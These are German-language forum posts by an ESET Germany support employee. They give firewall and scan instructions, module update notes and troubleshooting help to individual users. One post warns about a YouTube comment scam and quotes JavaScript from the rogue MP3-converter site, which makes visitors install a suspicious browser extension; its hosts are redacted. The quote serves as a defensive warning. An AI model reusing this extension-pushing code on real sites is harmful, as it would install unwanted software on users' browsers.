Beiträge von ESET Deutschland

Hallo,

da Version 6 als Release Candidate nur in Englisch zur Verfügung steht, also auch die englischen Begriffe. Die gleiche Vorgehensweise gilt natürlich auch in den aktuellen, deutschen Produkten, von daher lasse ich die "Beta / RC - Frage" hier im normalen Thread und verschiebe sie nicht in den entsprechenden...

Um nicht im Regelwerk eine neue Regel händisch anlegen zu müssen (was aber durchaus machbar ist, nur umständlicher zu beschreiben ), hier nun eine schnellere Variante:

Öffne die Programmoberfläche und drücke F5. Gehe nun im neuen Fenster zu "Network > Personal Firewall" und wähle bei Filtering Mode: "Interactive Mode". Schließe nun die Einstellungen mit "OK" und führe anschließend das entsprechende Programm aus. Nun sollte dank interaktivem Modus eine entsprechende Abfrage kommen, da klickst Du auf "Create Rule" (Häkchen) und dann auf den großen "Allow" Button.

Anschließend öffnest Du wieder die erweiterten Einstellungen mit F5, gehst wieder zu "Network > Personal Firewall" und wählst diesmal "Automatic mode with exceptions (user-defined rules)", sofern Du nicht weiter den interaktiven Modus nutzen möchtest.

Doch doch! Über die Signaturupdates werden auch die verwendeten Module aktualisiert. Erst dann nicht mehr, wenn eine Version direkt aus dem Support mit mind. einjähriger Ankündigung genommen wird, wie im Mai die Version 2.7 für Windows von 2005...

ESET Cyber Security / ESET Cyber Security Pro (V5) werden voraussichtlich Ende des Jahres releast werden.
Allerdings mit tatsächlichem Erscheinen von Mac OS X 10.8 Mountain Lion wird es sowohl die aktuelle Version 4 der ESET Cybersecurity, als auch die Betas der ESET Cyber Security / ESET Cyber Security Pro Modulupdates zur vollen Unterstützung des neuen Betriebssystems geben.

Nicht zwingend, zumal Du ohne es zu wissen schon einen hast - von Deinem Provider

Das konnte ich jetzt in einer VM ohne Virenscanner nachvollziehen - die Subseite /macnews wollte auch da nicht laden - habe sogar einen Timeout bekommen - ich habe dann nur giga.de aufgerufen, die Seite kam, danach wieder /macnews und siehe da, die Seite wurde fix geladen - keine Ahnung, aber das muss wohl bei denen liegen?!

Das lässt sich mit den Infos wirklich schlecht sagen - generell glaube ich nicht, dass die ESET Cybersecurity, die in Version 4 nur lokal prüft, das Surfen verlangsamt - wahrscheinlicher ist, dass z.B. Scripte auf der Webseite länger zum Laden brauchen oder Browser eigene Prüfungen der Webseiten geschehen usw.

Wenn das Phänomen wieder auftaucht, und sich z.B. bei einer bestimmten Webseite immer wieder nachvollziehen lässt, dann teile mir das bitte mit und ich schau es mir an!

Hallo, zur Klarheit: ESET Cybersecurity = Version 4.x - ESET Cyber Security / ESET Cyber Security Pro = Version 5.x - die Versionsnummern werden bloß nicht im Namen getragen...

Update:

Firewall Modul 1084P (V6 beta/RC Nutzer)

Changelog:
- changes pertaining to v6

Viren- und Spyware-Schutz Modul 1364 (Pre-Release- / Testupdates)

Changelog:
- minor internal fixes

Anti-Stealth-Unterstützung Modul 1031 (alle)

Changelog:
- added: support for Windows8 Release Preview (x64 only, x86 version already compatible)

Ui, na das hab ich ja ganz schön schleifen lassen hier! :-O
Ich gelobe Besserung, da unter http://blog.eset.com immer häufiger Malware-Analysen veröffentlicht werden.

Ich möchte an dieser Stelle nur vor der Analyse schon warnen vor einem aktuell grasierenden Scam auf Youtube. In den Kommentaren zu beliebten Videos finden sich immer häufiger Kommentare alá
"“@bjrootn oohh true! this track is sooo good! Yeah and peeps are using this to get the mp3 of this music ==> http://bit.ly/XXXXXX”
Niemals diese Links zur angeblichen MP3 Konvertierung des Songs o.ä. anklicken!

Eine erste Schnell-Analyse zeigt alleine schon folgendes:
[code linenumbers=false]
That bit.ly address, once expanded, redirects the browser on a site that mimics the well-known site http://www.youtube-mpXXXX and tries to install a suspicious extension in Firefox and Chrome, as exemplified by part of the Javascript script included in the suspicious (rogue?) website

function downloadClick(){
if (installed){
document.location.href = 'http://www.XXXXXXX/?v=' + encodeURIComponent(document.getElementById('video-url').value);
return true;
} else {
if (loadingVideo){
if (is_chrome){
document.getElementById('dvInstall').style.display = 'block';
installExtension('http://XXXXXX.crx');
} else if(is_firefox){
window.location.hash = 'firefox';
installExtension('http://XXXXXX.xpi');
} else {
alert("Unable to download this MP3. The " + browser + " browser is not supported.\n\nPlease try again using the latest version of Google Chrome or Mozilla Firefox");
}
} else {
document.location.href = 'http://XXXXXXX?v=' + encodeURIComponent(document.getElementById('video-url').value);
return true;
}

return false;
}
}

Looking at the Youtube account of “angelicaSee” (supposed author of the comment) at http://www.youtube.com/user/angelicaSee it seems a hacked account opened a while ago by a 14 years old girl from Philippines.
[/code]

Ok, einigen wir uns auf unentschieden!

[size=36]

uweli1967 - die Infektion ist mit ESET behoben worden, offensichtlich existiert allerdings noch ein Browsereintrag oder Cookie, dass versucht, diese Verbindung aufzubauen - aus der Ferne ist das immer schlecht zu sagen, bei so spärlichen Infos.
Dass ich Deinen Post editiert habe liegt daran, dass dies hier der ESET Supportbereich ist und es keinen Grund gibt, hier Tools zu verlinken, die keinen Deut hilfreich für ciphercore an dieser Stelle sind...
Danke für Dein Verständnis, ich schätze auch Deinen Eifer, ciphercore helfen zu wollen!

ciphercore: Hast Du den Browser auch so "behandelt", wie ich das geschrieben habe? Es war übrigens nie die Rede davon, die Dateien aus der Quarantäne zu löschen! Ich brauche die Namen!!!
Bitte folge den Hinweisen zum Browser und schaue im ESET Programm unter "Tools > Log-Dateien" in der Auswahl "Computer prüfen", was beim letzten Prüfergebnis gefunden wurde und benenne es!

Hallo,

bitte führe eine Tiefenprüfung des Systems durch. Das tust Du, indem Du im Programm auf "Computer prüfen > Prüfen mit speziellen Einstellungen" gehst, das Prüfprofil "Tiefenprüfung" wählst und anschließend auf "Einstellungen" klickst.
Im Einstellungsfenster wählst Du bitte bei "Objekte" und "Methoden" alle Optionen an, sofern nicht schon geschehen und bestätigst mit "OK".

Im Prüffenster setzt Du das Häkchen vor "Computer", sodass alles geprüft wird und klickst auf "Speichern", damit Du später diese Einstellungen wieder gleich bei einer Tiefenprüfung verwenden kannst.
Anschließend startes Du den Scan mit "Als Administrator prüfen" und teilst mir bitte das Ergebnis mit, bzw. lässt im Auswahlbildschirm alle Bedrohungen löschen, ein Kopie geht immer auch in Quarantäne, sodass evtl. auch Dateien wieder hergestellt werden können.

Vorher empfehle ich Dir noch, den Cache des Firefox zu leeren. Das kannst Du tun, indem Du (sofern schon vorhanden) entweder die entsprechende Option des CCleaners nutzt oder den FF öffnest und links oben auf das FF Symbol klickst und auf "Einstellungen > Einstellungen" gehst.

Dort im Fenster gehst Du zu "Erweitert" und dort zum Tab "Netzwerk" und wählst jeweils die beiden Buttons "Jetzt leeren". Anschließend kannst Du noch zu "Allgemein" gehen und dort auf "Add-ons verwalten" klicken. Gehe die Liste durch und deaktiviere, was Dir verdächtig vorkommt.

[UPDATE]
Ich habe noch ein wenig recherchiert: http://allfacebook.de/beyond/browserplugin-facetheme das kannst Du mal gucken - außerdem habe ich gelesen, dass wohl bei der Installation vom Formatwandler "Super" dieses Facetheme mit installiert wird...

Hallo,

Du schreibst, dass Du manchmal zw. 90 und 100% CPU Auslastung hast. Im Task-Manager werden bei egui.exe (grafische Oberfläche) und ekrn.exe (Programm) von ESET jeweils 0% angezeigt.
Daher ist es sinnvoll, wenn Du bitte den Task-Manager offen hältst und in genau dem Moment wo das System langsam wird, schaust welcher Prozess gerade das System auslastet - die CPU und/oder den Arbeitsspeicher.

Hallo,

ich schaue gerade das ESI Log durch und finde eine ganze Menge an Einträgen im Ereignislog:
"Entry" = "Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist." 12/07/2012 20:30:36 ; "

Dies kann mehrere Ursachen und damit auch Folgen haben - schaue mal bitte auf die folgenden 2 Seiten:
http://support.microsoft.com/kb/950375/de bzw. http://social.technet.microsoft.com/wiki/contents/…ctionality.aspx

Außerdem würde ich Dich bitten zu prüfen, ob Du tatsächlich alle Updates von Microsoft eingespielt hast.

Zusätzlich sind einige Fehlermeldungen der crypt32.dll enthalten - es könnte(!) sein, dass Dein installiertes TrueCrypt und die Windows Verschlüsselung sich erst einmal nach "dem Aufwecken einigen müssen"...

Dein DVBViewer greift außerdem noch auf sämtliche Netzwerk-Ressourcen wie physischer Host und VMs zu - möglicherweise gibt es auch hier im DNS bzw. dem Netzwerksetup inkl. der Zuweisung von der FritzBox(?) Probleme.

Ich habe Dir per Mail gerade eine Konfigurationsänderung bezgl. der Update-Tasks geschickt, die Du bitte unter "Einstellungen > Einstellungen importieren/exportieren" importierst und mir dann bescheid sagst, ob sich da etwas verändert hat.

Siehst Du im Taskmanager einen Prozess, der die 90-100% CPU Last erzeugt?

Du musst den Reiter "Prozesse" und dann im unteren Teil des Taskmanager-Fensters "Prozesse aller Benutzer anzeigen" auswählen, dann siehst Du auch die ekrn.exe. Und RAM = Arbeitsspeicher.

Hallo,

so ganz ohne Punkt und Komma war es schon nicht ganz einfach, Dein Problem zu verstehen.
Deswegen hier ein paar Fragen:
Du sprichst von einem Trojaner-Fund - war das vorher mit V4 irgendwann oder erst gestern bzw. heute? Hast Du am System seit gestern noch etwas verändert, wie z.B. neue Software installiert?
Was sagt denn Dein Taskmanager zu den beiden Prozessen ekrn.exe und egui.exe was RAM- und CPU-Auslastung angeht?

Hallo diddi8,
danke für die Rückmeldung - nachstellen können wir das weder mit physischen, noch mit virtuellen Maschinen, weder im Ruhezustand, noch im Standby - in meinen Profilinformationen steht meine E-Mail-Adresse - schick mir da bitte mal ein ESET SysInspector Log zu. Das findest Du im Programm unter "Tools", klickst dort auf "Erstellen" und wenn es erstellt ist, dann klickst Du mit der rechten Maustaste auf den Eintrag und wählst "Exportieren" und speicherst das Log bitte als ZIP ab und hängst es an die Mail an mich - dann schau ich mal, was da schief gelaufen sein könnte.
Außerdem würde ich Dich bitten, mir die Einstellungen zu exportieren und ebenfalls an die Mail zu hängen...

Danke!

Tommi

Zumindest "technisch" gibt es einen Unterschied, inwieweit ESET da Probleme hat, kann ich im Moment nicht sagen, aber mal anfragen!
Beim Ruhezustand oder auch "Hibernate" wird der gesamte RAM-Inhalt auf die Festplatte geschrieben, das System kann stromlos gemacht werden und beim "Aufwecken" wird der Inhalt dann wieder in den RAM geschoben.
Beim Standby wird der RAM weiter mit Strom versorgt, lediglich einige Systemkomponenten, wie z.B. die CPU können deaktiviert werden.

Bei welchem der beiden Modi hast Du genau die Probleme mit dem Update?